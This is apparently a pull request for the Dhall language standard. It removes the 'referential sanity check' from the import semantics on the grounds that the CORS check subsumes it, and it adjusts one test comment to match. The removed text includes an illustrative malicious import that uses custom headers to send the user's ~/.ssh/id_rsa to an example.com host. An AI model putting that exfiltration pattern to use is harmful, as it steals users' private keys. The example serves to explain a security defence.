### PR TITLE
Remove referential sanity check

### DIFF
--- a/standard/imports.md
+++ b/standard/imports.md
@@ -379,101 +379,6 @@ Path components after parsing and in the binary encoding are always unescaped
 To import a URL, percent-encode each path component according to
 [RFC 3986 - Section 2](https://tools.ietf.org/html/rfc3986#section-2).
 
-## Referential sanity check
-
-The referential sanity check is used to ensure that a "referentially
-transparent" import can never depend on a "referentially opaque" import.
-
-A remote import such as `https://example.com/foo` is "referentially transparent"
-because the contents of the import does not change depending on which machine
-you import it from (with caveats, such as not tampering with DNS, etc.).
-
-All non-remote imports are "referentially opaque" because their contents depend
-on which machine that you import them from.
-
-Referential transparency is checked using a judgment of the form:
-
-    referentiallySane(parent, child)
-
-... where
-
-* `parent` (an input) is the canonicalized path of the parent import
-* `child` (an input) is the canonicalized path of the child import
-
-There is no output: either the judgment matches or it does not.
-
-The rules for the referential transparency check ensure that a referentially
-transparent parent can never import a referentially opaque child.  In practice
-this means that remote imports can only import other remote imports (after
-both imports have been canonicalized):
-
-
-    ───────────────────────────────────────────────────────────────────────────────────────────
-    referentiallySane(https://authority₀ directory₀ file₀, https://authority₁ directory₁ file₁)
-
-
-... whereas non-remote imports can import anything:
-
-
-    ────────────────────────────────────
-    referentiallySane(path file, import)
-
-
-    ──────────────────────────────────────
-    referentiallySane(. path file, import)
-
-
-    ───────────────────────────────────────
-    referentiallySane(.. path file, import)
-
-
-    ──────────────────────────────────────
-    referentiallySane(~ path file, import)
-
-
-    ────────────────────────────────
-    referentiallySane(env:x, import)
-
-
-This is a security check because it prevents remote imports from exfiltrating
-local paths and environment variables using the language's support for
-custom headers.  For example, this check prevents the following malicious
-import:
-
-
-    {- This file is hosted at `https://example.com/bad` and attempts to steal a
-       sensitive file from the user's system using the language's support for
-       custom headers
-    -}
-    https://example.com/recordHeaders using ./headers
-
-... which in turn tries to import this file:
-
-    {- This file is hosted at `https://example.com/headers` and attempts to
-       read in the contents of the user's private key
-
-       This import would be rejected because its canonical path is:
-
-           https://example.com/headers
-
-       ... whereas the canonical path of the private key is:
-
-           ~/.ssh/id_rsa
-
-       ... and the following `referentiallySane` judgment is not valid:
-
-           referentiallySane(https://example.com/headers, ~/.ssh/id_rsa)
-
-       ... because the referentially transparent remote import is trying to
-       access a referentially opaque local import.
-    -}
-    [ { header = "Private Key", value = ~/.ssh/id_rsa as Text } ]
-
-
-This is also a sanity check because a referentially transparent import cannot
-truly be referentially transparent if it depends on any referentially opaque
-imports.
-
 ## CORS
 
 To protect against server-side request forging, Dhall rejects certain transitive
@@ -551,6 +456,9 @@ authority then the transitive remote import is rejected.  If there is not
 exactly one value for the `Access-Control-Allow-Origin` header then the
 transitive remote import is also rejected.
 
+Note well that there is no inference rule that allows a remote parent
+requesting a local child to be corsCompliant().
+
 ## Import resolution judgment
 
 The import resolution phase replaces all imports with the expression located
@@ -584,7 +492,6 @@ resolve imports within the retrieved expression:
 
     parent </> import₀ = import₁
     canonicalize(import₁) = child
-    referentiallySane(parent, child)
     Γ(child) = e₀ using responseHeaders     ; Retrieve the expression, possibly
                                             ; binding any response headers to
                                             ; `responseHeaders` if child was a
@@ -611,7 +518,6 @@ If an import ends with `as Text`, import the raw contents of the file as a
 
     parent </> import₀ = import₁
     canonicalize(import₁) = child
-    referentiallySane(parent, child)
     Γ(child) = "s" using responseHeaders  ; Read the raw contents of the file
     corsCompliant(parent, responseHeaders)
     ───────────────────────────────────────────
@@ -627,7 +533,6 @@ the resolved expression as additional headers supplied to the HTTP request:
     headers ⇥ requestHeaders
     parent </> import₀ = import₁
     canonicalize(import₁) = child
-    referentiallySane(parent, child)
     Γ₁(https://authority directory file using requestHeaders) = e₀ using responseHeaders ; Append requestHeaders to the request's headers
     corsCompliant(parent, responseHeaders)
     (Δ, parent, child) × Γ₁ ⊢ e₀ ⇒ e₁ ⊢ Γ₂

--- a/tests/import/failure/remoteRequiringLocal.dhall
+++ b/tests/import/failure/remoteRequiringLocal.dhall
@@ -1,12 +1,12 @@
 {- The following remote import attempts to import an environment variable, which
-   must be disallowed by the referential sanity check
+   must be disallowed by the CORS check
 
    One reason for doing this is to protect against remote imports exfiltrating
    environment variables (such as via custom headers).  Only referentially
    opaque imports (i.e. local imports) have permission to refer to other
    referentially opaque imports in order to protect against this attack.
 
-   The referential sanity check also ensures that remote imports are
+   The CORS check also ensures that remote imports are
    referentially transparent.  Or in other words, any import that is globally
    addressable must have a meaning that is not context-sensitive.
 -}


### PR DESCRIPTION
As I was implementing imports, I realised that the referential sanity
check is strictly more permissive than the CORS check.  This means we
don't need it, because anything which is not referentially sane will
also fail the CORS check.

This makes the import semantics simpler to describe, without changing
its meaning.

I also changed the "referentiallyInsane" test to try to use less of the
"referential sanity" language, since that terminology is no longer
defined in the semantics.

I've made this a draft PR because I want to get a sense from people if they
think this is a good change in principle first.  Then, if people think this makes
sense in principle, I'd like to look in more detail at the language.  For example,
some of the existing text in the "referential sanity check" section is probably
still valuable and could be ported over to the CORS check section.